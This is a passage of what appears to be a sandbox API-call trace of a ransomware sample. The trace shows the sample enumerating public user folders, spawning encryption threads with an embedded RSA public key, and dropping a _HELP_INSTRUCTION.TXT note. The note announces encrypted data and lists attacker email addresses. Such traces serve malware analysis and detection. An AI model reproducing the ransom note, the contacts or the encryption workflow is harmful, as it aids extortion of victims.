(lpFileName="C:\\Users\\Public\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf08 [0207.861] CloseHandle (hObject=0xf08) returned 1 [0207.861] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x43723f8 [0207.861] PathFindFileNameW (pszPath="C:\\Users\\Public") returned="Public" [0207.861] lstrcpyW (in: lpString1=0x17d784, lpString2="Public" | out: lpString1="Public") returned="Public" [0207.861] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0207.861] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0207.861] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0207.861] SetErrorMode (uMode=0x1) returned 0x1 [0207.861] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0207.861] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0207.861] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Desktop\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0207.861] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Desktop\\*.*") returned="C:\\Users\\Public\\Desktop\\*.*" [0207.861] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0207.861] PathFindFileNameW (pszPath="C:\\Users\\Public\\Desktop") returned="Desktop" [0207.861] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0207.862] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0207.862] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="ntldr") returned 0x0 [0207.862] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="NTLDR") returned 0x0 [0207.862] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0207.862] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="ntdetect.com") returned 0x0 [0207.862] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned 28 [0207.862] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Desktop\\") [0207.862] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.862] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Adobe Reader X.lnk" | out: lpString1="Adobe Reader X.lnk") returned="Adobe Reader X.lnk" [0207.862] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned="\\\\?\\C:\\Users\\Public\\Desktop\\" [0207.862] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf10 [0207.862] Sleep (dwMilliseconds=0x96) [0208.016] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.016] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0208.016] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0208.016] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0208.016] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0208.016] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0208.016] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0208.016] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0208.016] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned 28 [0208.016] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Desktop\\") [0208.016] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.016] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0208.016] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned="\\\\?\\C:\\Users\\Public\\Desktop\\" [0208.016] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf14 [0208.016] WaitForSingleObject (hHandle=0xf14, dwMilliseconds=0xffffffff) returned 0x0 [0208.018] Sleep (dwMilliseconds=0x96) [0208.175] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.175] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0208.175] lstrcmpW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0208.175] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0208.175] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="ntldr") returned 0x0 [0208.175] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="NTLDR") returned 0x0 [0208.175] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0208.175] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="ntdetect.com") returned 0x0 [0208.175] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned 28 [0208.176] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Desktop\\") [0208.176] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.176] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Google Chrome.lnk" | out: lpString1="Google Chrome.lnk") returned="Google Chrome.lnk" [0208.176] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned="\\\\?\\C:\\Users\\Public\\Desktop\\" [0208.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf18 [0208.176] Sleep (dwMilliseconds=0x96) [0208.328] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.328] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0208.328] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0208.328] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0208.328] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="ntldr") returned 0x0 [0208.328] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="NTLDR") returned 0x0 [0208.328] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0208.328] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="ntdetect.com") returned 0x0 [0208.328] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned 28 [0208.328] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Desktop\\") [0208.328] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.328] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Mozilla Firefox.lnk" | out: lpString1="Mozilla Firefox.lnk") returned="Mozilla Firefox.lnk" [0208.328] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned="\\\\?\\C:\\Users\\Public\\Desktop\\" [0208.328] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf1c [0208.329] Sleep (dwMilliseconds=0x96) [0208.484] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0208.484] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0208.484] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0208.484] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0208.484] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Desktop\\*.*") returned="C:\\Users\\Public\\Desktop\\*.*" [0208.484] SetErrorMode (uMode=0x1) returned 0x1 [0208.484] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Desktop\\_HELP_INSTRUCTION.TXT") returned 45 [0208.484] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0208.484] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0208.484] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xf20) returned 0x0 [0208.484] RegQueryValueExW (in: hKey=0xf20, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43819b8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43819b8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0208.484] RegCloseKey (hKey=0xf20) returned 0x0 [0208.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0208.484] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0208.485] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\desktop\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0208.485] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\desktop\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0208.485] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0208.485] PathFindFileNameW (pszPath="C:\\Users\\Public\\Desktop") returned="Desktop" [0208.485] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0208.485] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0208.485] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0208.485] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0208.485] SetErrorMode (uMode=0x1) returned 0x1 [0208.485] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0208.485] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0208.485] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Documents\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0208.485] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\*.*") returned="C:\\Users\\Public\\Documents\\*.*" [0208.485] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0208.485] PathFindFileNameW (pszPath="C:\\Users\\Public\\Documents") returned="Documents" [0208.485] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0208.485] StrStrW (lpFirst="94338BDA105A8F7E16CC5903148F73C6.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0208.485] StrStrW (lpFirst="94338BDA105A8F7E16CC5903148F73C6.XZZX", lpSrch="ntldr") returned 0x0 [0208.485] StrStrW (lpFirst="94338BDA105A8F7E16CC5903148F73C6.XZZX", lpSrch="NTLDR") returned 0x0 [0208.485] StrStrW (lpFirst="94338BDA105A8F7E16CC5903148F73C6.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0208.485] StrStrW (lpFirst="94338BDA105A8F7E16CC5903148F73C6.XZZX", lpSrch="ntdetect.com") returned 0x0 [0208.485] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Documents\\") returned 30 [0208.485] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Documents\\") [0208.485] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.485] lstrcpyW (in: lpString1=0x17cf1c, lpString2="94338BDA105A8F7E16CC5903148F73C6.XZZX" | out: lpString1="94338BDA105A8F7E16CC5903148F73C6.XZZX") returned="94338BDA105A8F7E16CC5903148F73C6.XZZX" [0208.486] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\") returned="\\\\?\\C:\\Users\\Public\\Documents\\" [0208.486] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf28 [0208.486] Sleep (dwMilliseconds=0x96) [0208.640] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.640] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.640] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.640] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.640] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0208.640] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0208.640] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0208.640] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0208.640] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0208.640] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0208.640] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0208.640] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\*.*") returned="C:\\Users\\Public\\Documents\\*.*" [0208.640] SetErrorMode (uMode=0x1) returned 0x1 [0208.640] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Documents\\_HELP_INSTRUCTION.TXT") returned 47 [0208.640] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0208.640] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0208.641] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xf2c) returned 0x0 [0208.641] RegQueryValueExW (in: hKey=0xf2c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4381be8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4381be8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0208.641] RegCloseKey (hKey=0xf2c) returned 0x0 [0208.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0208.641] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0208.641] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf2c [0208.641] CloseHandle (hObject=0xf2c) returned 1 [0208.641] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0208.641] PathFindFileNameW (pszPath="C:\\Users\\Public\\Documents") returned="Documents" [0208.641] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0208.641] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0208.641] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0208.641] lstrcatW (in: 